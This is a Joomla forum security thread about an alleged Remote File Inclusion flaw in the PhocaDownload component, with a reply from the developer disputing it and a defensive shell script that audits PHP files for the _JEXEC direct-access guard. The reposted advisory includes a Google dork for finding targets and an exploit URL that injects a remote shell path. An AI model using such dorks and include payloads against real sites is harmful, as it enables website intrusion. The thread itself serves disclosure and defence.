Joomla.it Forum

Not only Joomla... => Security => : jeckodevelopment 10 Nov 2010, 12:28:33

: Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
: jeckodevelopment 10 Nov 2010, 12:28:33
Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
There is no further information yet about the alleged RFI (Remote File Inclusion) vulnerability in the PhocaDownload component; we recommend checking the component developer's site often for any updates.

:
=========================================================

Joomla Component Phocadownload RFI Vulnerability

=========================================================
Title : Joomla Component phocadownload RFI Vulnerability
Software : Phocadownload
Vendor : http://www.phoca.cz/
Download :
http://www.phoca.cz/download/category/4-phoca-download-component

###########################################
Dork : inurl:index.php?option="com_phocadownload"
-----------------------------------------------------------------------
RFI Exploit

Exploit :

http://example.com/components/com_phocadownload/phocadownload.php?mosConfig_absolute_path=[ Shell txt ]

: Re:Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
: H13 22 Nov 2010, 19:30:41
Hi, Phoca Download does not work with the variable: mosConfig_absolute_path

Mostly, Joomla! itself doesn't allow accessing the file directly.

Exactly:
phocadownload.php is protected by:
defined( '_JEXEC' ) or die( 'Restricted access' );

so you get "Restricted access", nothing more.

Jan
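
One way a site owner can check the point Jan makes on their own install, as an added example that is not part of the thread and not Phoca's or Joomla's own code: a small POSIX-sh audit that walks a Joomla tree and reports any PHP file whose first lines lack the `_JEXEC` guard. Only Joomla's own index.php defines `_JEXEC` before loading a component, so a guarded file stops with "Restricted access" when fetched by URL, while an unguarded one runs stand-alone. The sample tree, its file names and the `$cfg_path` variable in the unguarded file are constructed for the demonstration.

```shell
#!/bin/sh
# Added example for this thread (not Phoca's or Joomla's code): audit a Joomla
# tree for PHP files that lack the direct-access guard
#   defined('_JEXEC') or die('Restricted access');
# Files without it can be executed directly by URL, which is the precondition
# for the kind of include issue the advisory claims.

# list_unguarded DIR
#   Prints "UNGUARDED: <path>" for every .php file under DIR whose first 20
#   lines never mention _JEXEC. Returns 0 when every file is guarded, 1
#   otherwise. (Paths containing whitespace are not handled, to keep the
#   loop plain POSIX sh.)
list_unguarded() {
    dir="$1"
    rc=0
    for f in $(find "$dir" -type f -name '*.php' | sort); do
        if ! head -n 20 "$f" | grep -q '_JEXEC'; then
            echo "UNGUARDED: $f"
            rc=1
        fi
    done
    return "$rc"
}

# make_demo_tree
#   Builds a constructed sample tree in a temp directory and prints its path.
#   example.php carries the guard; legacy.php (hypothetical, written only to
#   show the pattern to avoid) builds an include path from a variable and has
#   no guard at all.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/components/com_example"
    printf '%s\n' '<?php' \
        "defined('_JEXEC') or die('Restricted access');" \
        'echo "component entry point";' \
        > "$root/components/com_example/example.php"
    printf '%s\n' '<?php' \
        '// no guard: reachable directly by URL' \
        'require_once $cfg_path . "/helper.php";' \
        > "$root/components/com_example/legacy.php"
    echo "$root"
}

# Usage on a real site: list_unguarded /var/www/joomla/components
# The demo below runs against the constructed tree instead.
demo_root=$(make_demo_tree)
list_unguarded "$demo_root" || echo "at least one file lacks the _JEXEC guard"
```

The check only looks at the first 20 lines, so a guard placed further down (after a `require` that already ran) would pass the audit but still not protect that earlier include; put the guard on the first line after `<?php`, as Jan describes.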

: Re:Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
: mau_develop 22 Nov 2010, 19:59:06
yeah! ... of course... like others without a short PoC or disclosure.... only kiddie and obsolete advisory services

thanks for your post and script

bye

M.